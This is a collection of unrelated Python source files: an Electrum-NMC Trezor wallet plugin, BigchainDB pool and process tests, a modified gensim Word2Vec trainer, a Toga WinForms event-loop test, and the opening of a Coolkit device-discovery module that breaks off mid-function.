trezor.py
from binascii import hexlify, unhexlify import traceback import sys from electrum_nmc.util import bfh, bh2u, versiontuple, UserCancelled from electrum_nmc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey, TYPE_ADDRESS, TYPE_SCRIPT, is_address) from electrum_nmc import constants from electrum_nmc.i18n import _ from electrum_nmc.plugins import BasePlugin, Device from electrum_nmc.transaction import deserialize, Transaction from electrum_nmc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation from electrum_nmc.base_wizard import ScriptTypeNotSupported from ..hw_wallet import HW_PluginBase # TREZOR initialization methods TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4) RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2) # script "generation" SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3) class TrezorKeyStore(Hardware_KeyStore): hw_type = 'trezor' device = 'TREZOR' def get_derivation(self): return self.derivation def get_script_gen(self): xtype = xtype_from_derivation(self.derivation) if xtype in ('p2wpkh', 'p2wsh'): return SCRIPT_GEN_NATIVE_SEGWIT elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'): return SCRIPT_GEN_P2SH_SEGWIT else: return SCRIPT_GEN_LEGACY def get_client(self, force_pair=True): return self.plugin.get_client(self, force_pair) def decrypt_message(self, sequence, message, password): raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device)) def sign_message(self, sequence, message, password): client = self.get_client() address_path = self.get_derivation() + "/%d/%d"%sequence address_n = client.expand_path(address_path) msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message) return msg_sig.signature def sign_transaction(self, tx, password): if tx.is_complete(): return # previous transactions used as inputs prev_tx = {} # path of the xpubs that are involved xpub_path = {} for txin in tx.inputs(): pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin) tx_hash = txin['prevout_hash'] if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin): raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device)) prev_tx[tx_hash] = txin['prev_tx'] for x_pubkey in x_pubkeys: if not is_xpubkey(x_pubkey): continue xpub, s = parse_xpubkey(x_pubkey) if xpub == self.get_master_public_key(): xpub_path[xpub] = self.get_derivation() self.plugin.sign_transaction(self, tx, prev_tx, xpub_path) class TrezorPlugin(HW_PluginBase): # Derived classes provide: # # class-static variables: client_class, firmware_URL, handler_class, # libraries_available, libraries_URL, minimum_firmware, # wallet_class, ckd_public, types firmware_URL = 'https://wallet.trezor.io' libraries_URL = 'https://github.com/trezor/python-trezor' minimum_firmware = (1, 5, 2) keystore_class = TrezorKeyStore minimum_library = (0, 9, 0) SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh') MAX_LABEL_LEN = 32 def __init__(self, parent, config, name): HW_PluginBase.__init__(self, parent, config, name) try: # Minimal test if python-trezor is installed import trezorlib try: library_version = trezorlib.__version__ except AttributeError: # python-trezor only introduced __version__ in 0.9.0 library_version = 'unknown' if library_version == 'unknown' or \ versiontuple(library_version) < self.minimum_library: self.libraries_available_message = ( _("Library version for '{}' is too old.").format(name) + '\nInstalled: {}, Needed: 
{}' .format(library_version, self.minimum_library)) self.print_stderr(self.libraries_available_message) raise ImportError() self.libraries_available = True except ImportError: self.libraries_available = False return from . import client from . import transport import trezorlib.ckd_public import trezorlib.messages self.client_class = client.TrezorClient self.ckd_public = trezorlib.ckd_public self.types = trezorlib.messages self.DEVICE_IDS = ('TREZOR',) self.transport_handler = transport.TrezorTransport() self.device_manager().register_enumerate_func(self.enumerate) def enumerate(self): devices = self.transport_handler.enumerate_devices() return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices] def create_client(self, device, handler): try: self.print_error("connecting to device at", device.path) transport = self.transport_handler.get_transport(device.path) except BaseException as e: self.print_error("cannot connect at", device.path, str(e)) return None if not transport: self.print_error("cannot connect at", device.path) return self.print_error("connected to device at", device.path) client = self.client_class(transport, handler, self) # Try a ping for device sanity try: client.ping('t') except BaseException as e: self.print_error("ping failed", str(e)) return None if not client.atleast_version(*self.minimum_firmware): msg = (_('Outdated {} firmware for device labelled {}. Please ' 'download the updated firmware from {}') .format(self.device, client.label(), self.firmware_URL)) self.print_error(msg) handler.show_error(msg) return None return client def get_client(self, keystore, force_pair=True): devmgr = self.device_manager() handler = keystore.handler with devmgr.hid_lock: client = devmgr.client_for_keystore(self, handler, keystore, force_pair) # returns the client for a given keystore. can use xpub if client: client.used() return client def get_coin_name(self): return "Testnet" if constants.net.TESTNET else "Bitcoin" def initialize_device(self, device_id, wizard, handler): # Initialization method msg = _("Choose how you want to initialize your {}.\n\n" "The first two methods are secure as no secret information " "is entered into your computer.\n\n" "For the last two methods you input secrets on your keyboard " "and upload them to your {}, and so you should " "only do those on a computer you know to be trustworthy " "and free of malware." 
).format(self.device, self.device) choices = [ # Must be short as QT doesn't word-wrap radio button text (TIM_NEW, _("Let the device generate a completely new seed randomly")), (TIM_RECOVER, _("Recover from a seed you have previously written down")), (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")), (TIM_PRIVKEY, _("Upload a master private key")) ] devmgr = self.device_manager() client = devmgr.client_by_id(device_id) model = client.get_trezor_model() def f(method): import threading settings = self.request_trezor_init_settings(wizard, method, model) t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler)) t.setDaemon(True) t.start() wizard.loop.exec_() wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f) def _initialize_device_safe(self, settings, method, device_id, wizard, handler): try: self._initialize_device(settings, method, device_id, wizard, handler) except UserCancelled: pass except BaseException as e: traceback.print_exc(file=sys.stderr) handler.show_error(str(e)) finally: wizard.loop.exit(0) def _initialize_device(self, settings, method, device_id, wizard, handler): item, label, pin_protection, passphrase_protection, recovery_type = settings if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS: handler.show_error(_( "You will be asked to enter 24 words regardless of your " "seed's actual length. If you enter a word incorrectly or " "misspell it, you cannot change it or go back - you will need " "to start again from the beginning.\n\nSo please enter " "the words carefully!"), blocking=True) language = 'english' devmgr = self.device_manager() client = devmgr.client_by_id(device_id) if method == TIM_NEW: strength = 64 * (item + 2) # 128, 192 or 256 u2f_counter = 0 skip_backup = False client.reset_device(True, strength, passphrase_protection, pin_protection, label, language, u2f_counter, skip_backup) elif method == TIM_RECOVER: word_count = 6 * (item + 2) # 12, 18 or 24 client.step = 0 if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS: recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords else: recovery_type_trezor = self.types.RecoveryDeviceType.Matrix client.recovery_device(word_count, passphrase_protection, pin_protection, label, language, type=recovery_type_trezor) if recovery_type == RECOVERY_TYPE_MATRIX: handler.close_matrix_dialog() elif method == TIM_MNEMONIC: pin = pin_protection # It's the pin, not a boolean client.load_device_by_mnemonic(str(item), pin, passphrase_protection, label, language) else: pin = pin_protection # It's the pin, not a boolean client.load_device_by_xprv(item, pin, passphrase_protection, label, language) def setup_device(self, device_info, wizard, purpose): devmgr = self.device_manager() device_id = device_info.device.id_ client = devmgr.client_by_id(device_id) if client is None: raise Exception(_('Failed to create a client for this device.') + '\n' + _('Make sure it is in the correct state.')) # fixme: we should use: client.handler = wizard client.handler = self.create_handler(wizard) if not device_info.initialized: self.initialize_device(device_id, wizard, client.handler) client.get_xpub('m', 'standard') client.used() def get_xpub(self, device_id, derivation, xtype, wizard): if xtype not in self.SUPPORTED_XTYPES: raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device)) devmgr = self.device_manager() client = devmgr.client_by_id(device_id) client.handler = wizard 
xpub = client.get_xpub(derivation, xtype) client.used() return xpub def get_trezor_input_script_type(self, script_gen, is_multisig): if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: return self.types.InputScriptType.SPENDWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: return self.types.InputScriptType.SPENDP2SHWITNESS else: if is_multisig: return self.types.InputScriptType.SPENDMULTISIG else: return self.types.InputScriptType.SPENDADDRESS def sign_transaction(self, keystore, tx, prev_tx, xpub_path): self.prev_tx = prev_tx self.xpub_path = xpub_path client = self.get_client(keystore) inputs = self.tx_inputs(tx, True, keystore.get_script_gen()) outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen()) signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1] raw = bh2u(signed_tx) tx.update_signatures(raw) def show_address(self, wallet, address, keystore=None): if keystore is None: keystore = wallet.get_keystore() if not self.show_address_helper(wallet, address, keystore): return client = self.get_client(keystore) if not client.atleast_version(1, 3): keystore.handler.show_error(_("Your device firmware is too old")) return change, index = wallet.get_address_index(address) derivation = keystore.derivation address_path = "%s/%d/%d"%(derivation, change, index) address_n = client.expand_path(address_path) xpubs = wallet.get_master_public_keys() if len(xpubs) == 1: script_gen = keystore.get_script_gen() script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False) client.get_address(self.get_coin_name(), address_n, True, script_type=script_type) else: def f(xpub): node = self.ckd_public.deserialize(xpub) return self.types.HDNodePathType(node=node, address_n=[change, index]) pubkeys = wallet.get_public_keys(address) # sort xpubs using the order of pubkeys sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs))) pubkeys = list(map(f, sorted_xpubs)) multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * wallet.n, m=wallet.m, ) script_gen = keystore.get_script_gen() script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True) client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type) def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY): inputs = [] for txin in tx.inputs(): txinputtype = self.types.TxInputType() if txin['type'] == 'coinbase': prev_hash = "\0"*32 prev_index = 0xffffffff # signed int -1 else: if for_sig: x_pubkeys = txin['x_pubkeys'] if len(x_pubkeys) == 1: x_pubkey = x_pubkeys[0] xpub, s = parse_xpubkey(x_pubkey) xpub_n = self.client_class.expand_path(self.xpub_path[xpub]) txinputtype._extend_address_n(xpub_n + s) txinputtype.script_type = self.get_trezor_input_script_type(script_gen, is_multisig=False) else: def f(x_pubkey): if is_xpubkey(x_pubkey): xpub, s = parse_xpubkey(x_pubkey) else: xpub = xpub_from_pubkey(0, bfh(x_pubkey)) s = [] node = self.ckd_public.deserialize(xpub) return self.types.HDNodePathType(node=node, address_n=s) pubkeys = list(map(f, x_pubkeys)) multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))), m=txin.get('num_sig'), ) script_type = self.get_trezor_input_script_type(script_gen, is_multisig=True) txinputtype = self.types.TxInputType( script_type=script_type, multisig=multisig ) # find which key is mine for x_pubkey in x_pubkeys: if is_xpubkey(x_pubkey): xpub, s = parse_xpubkey(x_pubkey) 
if xpub in self.xpub_path: xpub_n = self.client_class.expand_path(self.xpub_path[xpub]) txinputtype._extend_address_n(xpub_n + s) break prev_hash = unhexlify(txin['prevout_hash']) prev_index = txin['prevout_n'] if 'value' in txin: txinputtype.amount = txin['value'] txinputtype.prev_hash = prev_hash txinputtype.prev_index = prev_index if txin.get('scriptSig') is not None: script_sig = bfh(txin['scriptSig']) txinputtype.script_sig = script_sig txinputtype.sequence = txin.get('sequence', 0xffffffff - 1) inputs.append(txinputtype) return inputs def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY): def create_output_by_derivation(info): index, xpubs, m = info if len(xpubs) == 1: if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: script_type = self.types.OutputScriptType.PAYTOWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS else: script_type = self.types.OutputScriptType.PAYTOADDRESS address_n = self.client_class.expand_path(derivation + "/%d/%d" % index) txoutputtype = self.types.TxOutputType( amount=amount, script_type=script_type, address_n=address_n, ) else: if script_gen == SCRIPT_GEN_NATIVE_SEGWIT: script_type = self.types.OutputScriptType.PAYTOWITNESS elif script_gen == SCRIPT_GEN_P2SH_SEGWIT: script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS else: script_type = self.types.OutputScriptType.PAYTOMULTISIG address_n = self.client_class.expand_path("/%d/%d" % index) nodes = map(self.ckd_public.deserialize, xpubs) pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes] multisig = self.types.MultisigRedeemScriptType( pubkeys=pubkeys, signatures=[b''] * len(pubkeys), m=m) txoutputtype = self.types.TxOutputType( multisig=multisig, amount=amount, address_n=self.client_class.expand_path(derivation + "/%d/%d" % index), script_type=script_type) return txoutputtype def create_output_by_address(): txoutputtype = self.types.TxOutputType() txoutputtype.amount = amount if _type == TYPE_SCRIPT: txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN txoutputtype.op_return_data = address[2:] elif _type == TYPE_ADDRESS: txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS txoutputtype.address = address return txoutputtype def is_any_output_on_change_branch(): for _type, address, amount in tx.outputs(): info = tx.output_info.get(address) if info is not None: index, xpubs, m = info if index[0] == 1: return True return False outputs = [] has_change = False any_output_on_change_branch = is_any_output_on_change_branch() for _type, address, amount in tx.outputs(): use_create_by_derivation = False info = tx.output_info.get(address) if info is not None and not has_change: index, xpubs, m = info on_change_branch = index[0] == 1 # prioritise hiding outputs on the 'change' branch from user # because no more than one change address allowed # note: ^ restriction can be removed once we require fw # that has https://github.com/trezor/trezor-mcu/pull/306 if on_change_branch == any_output_on_change_branch: use_create_by_derivation = True has_change = True if use_create_by_derivation: txoutputtype = create_output_by_derivation(info) else: txoutputtype = create_output_by_address() outputs.append(txoutputtype) return outputs def electrum_tx_to_txtype(self, tx): t = self.types.TransactionType() if tx is None: # probably for segwit input and we don't need this prev txn return t d = deserialize(tx.raw) t.version = d['version'] t.lock_time = d['lockTime'] inputs = self.tx_inputs(tx) 
t._extend_inputs(inputs) for vout in d['outputs']: o = t._add_bin_outputs() o.amount = vout['value'] o.script_pubkey = bfh(vout['scriptPubKey']) return t # This function is called from the TREZOR libraries (via tx_api) def get_tx(self, tx_hash): tx = self.prev_tx[tx_hash] return self.electrum_tx_to_txtype(tx)
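A minimal, self-contained sketch of the derivation-to-script-type mapping implemented by TrezorKeyStore.get_script_gen() and TrezorPlugin.get_trezor_input_script_type() above. The string return values stand in for trezorlib.messages.InputScriptType members, so this is illustrative only, not the plugin's actual API.

# Sketch of the xtype -> "script generation" -> Trezor input-script-type mapping.
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(3)

def script_gen_from_xtype(xtype):
    if xtype in ('p2wpkh', 'p2wsh'):
        return SCRIPT_GEN_NATIVE_SEGWIT
    elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
        return SCRIPT_GEN_P2SH_SEGWIT
    return SCRIPT_GEN_LEGACY

def input_script_type(script_gen, is_multisig):
    # Placeholder strings instead of trezorlib enum members.
    if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
        return 'SPENDWITNESS'
    if script_gen == SCRIPT_GEN_P2SH_SEGWIT:
        return 'SPENDP2SHWITNESS'
    return 'SPENDMULTISIG' if is_multisig else 'SPENDADDRESS'

assert input_script_type(script_gen_from_xtype('p2wpkh'), False) == 'SPENDWITNESS'
assert input_script_type(script_gen_from_xtype('standard'), True) == 'SPENDMULTISIG'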
test_utils.py
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0

import queue
from unittest.mock import patch, call

import pytest

pytestmark = pytest.mark.tendermint


@pytest.fixture
def mock_queue(monkeypatch):

    class MockQueue:
        items = []

        def get(self, timeout=None):
            try:
                return self.items.pop()
            except IndexError:
                if timeout:
                    raise queue.Empty()
                raise

        def put(self, item):
            self.items.append(item)

    mockqueue = MockQueue()

    monkeypatch.setattr('queue.Queue', lambda: mockqueue)
    return mockqueue


def test_empty_pool_is_populated_with_instances(mock_queue):
    from bigchaindb import utils

    pool = utils.pool(lambda: 'hello', 4)

    assert len(mock_queue.items) == 0

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 1

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 2

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 3

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 4

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 4


def test_pool_blocks_if_no_instances_available(mock_queue):
    from bigchaindb import utils

    pool = utils.pool(lambda: 'hello', 4)

    assert len(mock_queue.items) == 0

    # We need to manually trigger the `__enter__` method so the context
    # manager will "hang" and not return the resource to the pool
    assert pool().__enter__() == 'hello'
    assert len(mock_queue.items) == 0

    assert pool().__enter__() == 'hello'
    assert len(mock_queue.items) == 0

    assert pool().__enter__() == 'hello'
    assert len(mock_queue.items) == 0

    # We need to keep a reference of the last context manager so we can
    # manually release the resource
    last = pool()
    assert last.__enter__() == 'hello'
    assert len(mock_queue.items) == 0

    # This would block using `queue.Queue`, but since we mocked it, it will
    # just raise an IndexError because it's trying to pop from an empty list.
    with pytest.raises(IndexError):
        assert pool().__enter__() == 'hello'
    assert len(mock_queue.items) == 0

    # Release the last resource
    last.__exit__(None, None, None)
    assert len(mock_queue.items) == 1

    assert pool().__enter__() == 'hello'
    assert len(mock_queue.items) == 0


def test_pool_raises_empty_exception_when_timeout(mock_queue):
    from bigchaindb import utils

    pool = utils.pool(lambda: 'hello', 1, timeout=1)

    assert len(mock_queue.items) == 0

    with pool() as instance:
        assert instance == 'hello'

    assert len(mock_queue.items) == 1

    # take the only resource available
    assert pool().__enter__() == 'hello'

    with pytest.raises(queue.Empty):
        with pool() as instance:
            assert instance == 'hello'


@patch('multiprocessing.Process')
def test_process_group_instantiates_and_start_processes(mock_process):
    from bigchaindb.utils import ProcessGroup

    def noop():
        pass

    concurrency = 10
    pg = ProcessGroup(concurrency=concurrency, group='test_group', target=noop)
    pg.start()

    mock_process.assert_has_calls([
        call(group='test_group', target=noop, name=None,
             args=(), kwargs={}, daemon=None)
        for i in range(concurrency)
    ], any_order=True)

    for process in pg.processes:
        process.start.assert_called_with()


def test_lazy_execution():
    from bigchaindb.utils import Lazy

    lz = Lazy()
    lz.split(',')[1].split(' ').pop(1).strip()
    result = lz.run('Like humans, cats tend to favor one paw over another')
    assert result == 'cats'

    class Cat:
        def __init__(self, name):
            self.name = name

    cat = Cat('Shmui')

    lz = Lazy()
    lz.name.upper()
    result = lz.run(cat)
    assert result == 'SHMUI'


def test_process_set_title():
    from uuid import uuid4
    from multiprocessing import Queue
    from setproctitle import getproctitle
    from bigchaindb.utils import Process

    queue = Queue()
    uuid = str(uuid4())

    process = Process(target=lambda: queue.put(getproctitle()), name=uuid)
    process.start()
    assert queue.get() == uuid
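bigchaindb.utils.pool itself is not shown in this section. The following is a hypothetical sketch, not the real implementation, of a queue-backed pool that lazily builds up to `size` instances and would behave the way these tests expect, including under the mocked queue.Queue.

# Hypothetical sketch of a resource pool consistent with the tests above.
import queue
from contextlib import contextmanager

def pool(builder, size, timeout=None):
    items = queue.Queue()          # replaced by MockQueue in the tests
    created = [0]                  # instances built so far (lazy construction)

    @contextmanager
    def pooled():
        if created[0] < size:
            created[0] += 1
            instance = builder()                   # build a fresh instance
        else:
            instance = items.get(timeout=timeout)  # blocks, or raises queue.Empty
        try:
            yield instance
        finally:
            items.put(instance)                    # return the resource to the pool

    return pooled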
skipgram.py
from __future__ import division # py3 "true division" """ Modified by Yikai Wang """ import logging import sys import os import heapq import copy import numpy as np from timeit import default_timer from copy import deepcopy from collections import defaultdict import threading import itertools try: from queue import Queue, Empty except ImportError: from Queue import Queue, Empty from numpy import exp, log, dot, zeros, outer, random, dtype, float32 as REAL,\ uint32, seterr, array, uint8, vstack, fromstring, sqrt, newaxis,\ ndarray, empty, sum as np_sum, prod, ones, ascontiguousarray from gensim import utils, matutils # utility fnc for pickling, common scipy operations etc from gensim.models import Word2Vec from gensim.models.word2vec import Vocab from six import iteritems, itervalues, string_types from six.moves import xrange from types import GeneratorType import random logger = logging.getLogger(__name__) try: from gensim.models.word2vec_inner import train_batch_sg, train_batch_cbow from gensim.models.word2vec_inner import score_sentence_sg, score_sentence_cbow from gensim.models.word2vec_inner import FAST_VERSION, MAX_WORDS_IN_BATCH except ImportError: # failed... fall back to plain numpy (20-80x slower training than the above) FAST_VERSION = -1 MAX_WORDS_IN_BATCH = 10000 # modified hierarchical softmax model based on Gensim's implementation class Word2Vec_hs_loss(Word2Vec): def __init__(self, sentences=None, **kwargs): self.inner_node_index_map = {} kwargs["hs"] = 1 kwargs["alpha"] = kwargs.get("alpha", 0.025) kwargs["min_alpha"] = kwargs.get("min_alpha", 0.001) kwargs["min_count"] = 0 kwargs["negative"] = 0 kwargs["sample"] = kwargs.get("sample", 1e-3) kwargs["workers"] = kwargs.get("workers", 20) super(self.__class__, self).__init__(sentences, **kwargs) # add a word as the child of current word in the coarser graph def add_word(self, word, parent_word, emb, cur_index): fake_vocab_size = int(1e7) word_index = len(self.vocab) inner_node_index = word_index - 1 parent_index = self.vocab[parent_word].index # add in the left subtree if word != parent_word: self.vocab[word] = Vocab(index=word_index, count=fake_vocab_size-word_index,sample_int=(2**32)) if emb is not None: self.syn0[cur_index] = emb else: self.syn0[cur_index] = self.syn0[parent_index] # the node in the coarsened graph serves as an inner node now self.index2word.append(word) self.vocab[word].code = array(list(self.vocab[parent_word].code) + [0], dtype=uint8) self.vocab[word].point = array(list(self.vocab[parent_word].point) + [inner_node_index], dtype=uint32) self.inner_node_index_map[parent_word] = inner_node_index else: if emb is not None: self.syn0[parent_index] = emb self.vocab[word].code = array(list(self.vocab[word].code) + [1], dtype=uint8) self.vocab[word].point = array(list(self.vocab[word].point) + [self.inner_node_index_map[word]], dtype=uint32) def train(self, sentences, total_words=None, word_count=0, total_examples=None, queue_factor=2, report_delay=0.1): """ Update the model's neural weights from a sequence of sentences (can be a once-only generator stream). For Word2Vec, each sentence must be a list of unicode strings. (Subclasses may accept other examples.) To support linear learning-rate decay from (initial) alpha to min_alpha, either total_examples (count of sentences) or total_words (count of raw words in sentences) should be provided, unless the sentences are the same as those that were used to initially build the vocabulary. 
""" self.loss = {} if FAST_VERSION < 0: import warnings warnings.warn("C extension not loaded for Word2Vec, training will be slow. " "Install a C compiler and reinstall gensim for fast training.") self.neg_labels = [] if self.negative > 0: # precompute negative labels optimization for pure-python training self.neg_labels = zeros(self.negative + 1) self.neg_labels[0] = 1. logger.info( "training model with %i workers on %i vocabulary and %i features, " "using sg=%s hs=%s sample=%s negative=%s", self.workers, len(self.vocab), self.layer1_size, self.sg, self.hs, self.sample, self.negative) if not self.vocab: raise RuntimeError("you must first build vocabulary before training the model") if not hasattr(self, 'syn0'): raise RuntimeError("you must first finalize vocabulary before training the model") if total_words is None and total_examples is None: if self.corpus_count: total_examples = self.corpus_count logger.info("expecting %i sentences, matching count from corpus used for vocabulary survey", total_examples) else: raise ValueError("you must provide either total_words or total_examples, to enable alpha and progress calculations") job_tally = 0 if self.iter > 1: sentences = utils.RepeatCorpusNTimes(sentences, self.iter) total_words = total_words and total_words * self.iter total_examples = total_examples and total_examples * self.iter def worker_loop(): """Train the model, lifting lists of sentences from the job_queue.""" work = matutils.zeros_aligned(self.layer1_size, dtype=REAL) # per-thread private work memory neu1 = matutils.zeros_aligned(self.layer1_size, dtype=REAL) jobs_processed = 0 while True: job = job_queue.get() if job is None: progress_queue.put(None) break # no more jobs => quit this worker sentences, alpha = job tally, raw_tally = self._do_train_job(sentences, alpha, (work, neu1)) progress_queue.put((len(sentences), tally, raw_tally)) # report back progress jobs_processed += 1 # logger.debug("worker exiting, processed %i jobs", jobs_processed) def job_producer(): """Fill jobs queue using the input `sentences` iterator.""" job_batch, batch_size = [], 0 pushed_words, pushed_examples = 0, 0 next_alpha = self.alpha job_no = 0 for sent_idx, sentence in enumerate(sentences): sentence_length = self._raw_word_count([sentence]) # can we fit this sentence into the existing job batch? 
if batch_size + sentence_length <= self.batch_words: # yes => add it to the current job job_batch.append(sentence) batch_size += sentence_length else: # no => submit the existing job #logger.debug( # "queueing job #%i (%i words, %i sentences) at alpha %.05f", # job_no, batch_size, len(job_batch), next_alpha) job_no += 1 job_queue.put((job_batch, next_alpha)) # update the learning rate for the next job if self.min_alpha < next_alpha: if total_examples: # examples-based decay pushed_examples += len(job_batch) progress = 1.0 * pushed_examples / total_examples else: # words-based decay pushed_words += self._raw_word_count(job_batch) progress = 1.0 * pushed_words / total_words next_alpha = self.alpha - (self.alpha - self.min_alpha) * progress next_alpha = max(self.min_alpha, next_alpha) # add the sentence that didn't fit as the first item of a new job job_batch, batch_size = [sentence], sentence_length # add the last job too (may be significantly smaller than batch_words) if job_batch: # logger.debug( # "queueing job #%i (%i words, %i sentences) at alpha %.05f", # job_no, batch_size, len(job_batch), next_alpha) job_no += 1 job_queue.put((job_batch, next_alpha)) if job_no == 0 and self.train_count == 0: logger.warning( "train() called with an empty iterator (if not intended, " "be sure to provide a corpus that offers restartable " "iteration = an iterable)." ) # give the workers heads up that they can finish -- no more work! for _ in xrange(self.workers): job_queue.put(None) logger.debug("job loop exiting, total %i jobs", job_no) # buffer ahead only a limited number of jobs.. this is the reason we can't simply use ThreadPool :( job_queue = Queue(maxsize=queue_factor * self.workers) progress_queue = Queue(maxsize=(queue_factor + 1) * self.workers) workers = [threading.Thread(target=worker_loop) for _ in xrange(self.workers)] unfinished_worker_count = len(workers) workers.append(threading.Thread(target=job_producer)) for thread in workers: thread.daemon = True # make interrupting the process with ctrl+c easier thread.start() example_count, trained_word_count, raw_word_count = 0, 0, word_count start, next_report = default_timer() - 0.00001, 1.0 prev_example_count = 0 while unfinished_worker_count > 0: report = progress_queue.get() # blocks if workers too slow if report is None: # a thread reporting that it finished unfinished_worker_count -= 1 # logger.info("worker thread finished; awaiting finish of %i more threads", unfinished_worker_count) continue examples, trained_words, raw_words = report job_tally += 1 # update progress stats example_count += examples trained_word_count += trained_words # only words in vocab & sampled raw_word_count += raw_words # log progress once every report_delay seconds elapsed = default_timer() - start if elapsed >= next_report: next_report = elapsed + report_delay # all done; report the final stats elapsed = default_timer() - start logger.info( "training on %i raw words (%i effective words) took %.1fs, %.0f effective words/s", raw_word_count, trained_word_count, elapsed, trained_word_count / elapsed) if job_tally < 10 * self.workers: logger.warn("under 10 jobs per worker: consider setting a smaller `batch_words' for smoother alpha decay") # check that the input corpus hasn't changed during iteration if total_examples and total_examples != example_count: logger.warn("supplied example count (%i) did not equal expected count (%i)", example_count, total_examples) if total_words and total_words != raw_word_count: logger.warn("supplied raw word count (%i) did not equal 
expected count (%i)", raw_word_count, total_words) self.train_count += 1 # number of times train() has been called self.total_train_time += elapsed self.clear_sims() return trained_word_count
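The learning-rate schedule buried in job_producer() above reduces to a linear interpolation. Here it is isolated as a standalone helper (the function name is mine, not gensim's) to make the decay explicit.

# Linear alpha decay used by job_producer(): interpolate from `alpha` down to
# `min_alpha` in proportion to the fraction of the corpus pushed so far
# (counted in examples or in raw words), never dropping below `min_alpha`.
def next_alpha(alpha, min_alpha, pushed, total):
    progress = 1.0 * pushed / total
    return max(min_alpha, alpha - (alpha - min_alpha) * progress)

assert next_alpha(0.025, 0.001, 0, 100) == 0.025      # start of training
assert next_alpha(0.025, 0.001, 100, 100) == 0.001    # end of training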
test_proactor.py
from toga_winforms.libs import proactor, WinForms
import unittest
import unittest.mock as mock
import asyncio
from threading import Thread


class Counter(object):
    def __init__(self):
        self.count = 0

    def increment(self):
        self.count += 1


class TestProactor(unittest.TestCase):
    def setUp(self):
        self.loop = proactor.WinformsProactorEventLoop()
        # asyncio.set_event_loop(self.loop)
        self.app_context = WinForms.ApplicationContext()

    def test_proactor_loop(self):
        print("=====================================================================")
        # c = Counter()
        # with mock.patch.object(Counter, 'increment', wraps=c.increment) as fake_increment:
        # args needs to be a one-element tuple
        thread = Thread(target=self.loop.run_forever, args=(self.app_context,))
        thread.start()
        # await asyncio.sleep(5)
        print('Started!')
        self.loop.call_soon_threadsafe(self.loop.stop)  # here
        print('Requested stop!')
        thread.join()
        # self.loop.run_forever(self.app_context)
        print('Finished!')
        # print("fake_increment:", fake_increment)
        # unittest.TestCase.assertGreaterEqual(1, fake_increment.count)
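The same start/stop pattern the test exercises, shown with a plain asyncio event loop so it runs without Windows Forms; call_soon_threadsafe is the only safe way to signal the loop from another thread.

# Run an event loop in a worker thread and stop it from the main thread.
import asyncio
from threading import Thread

loop = asyncio.new_event_loop()
thread = Thread(target=loop.run_forever)
thread.start()
loop.call_soon_threadsafe(loop.stop)  # schedule stop from the main thread
thread.join()
loop.close()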
discover.py
import asyncio
import re
import socket
from threading import Thread
from typing import Optional

from aiohttp import ClientSession
from zeroconf import ServiceBrowser, Zeroconf

from .devices_repository import CoolkitDevicesRepository
from .device import CoolkitDevice
from .log import Log
from .session import CoolkitSession


class CoolkitDevicesDiscovery:

    @classmethod
    async def discover(cls) -> bool:
        devices_endpoint = CoolkitSession.get_api_endpoint_url('api/user/device')

        async with ClientSession(headers=CoolkitSession.get_auth_headers()) as session:
            async with session.get(devices_endpoint) as response:
                data = await response.json()

                if response.status != 200 or ('error' in data and data['error'] != 0):
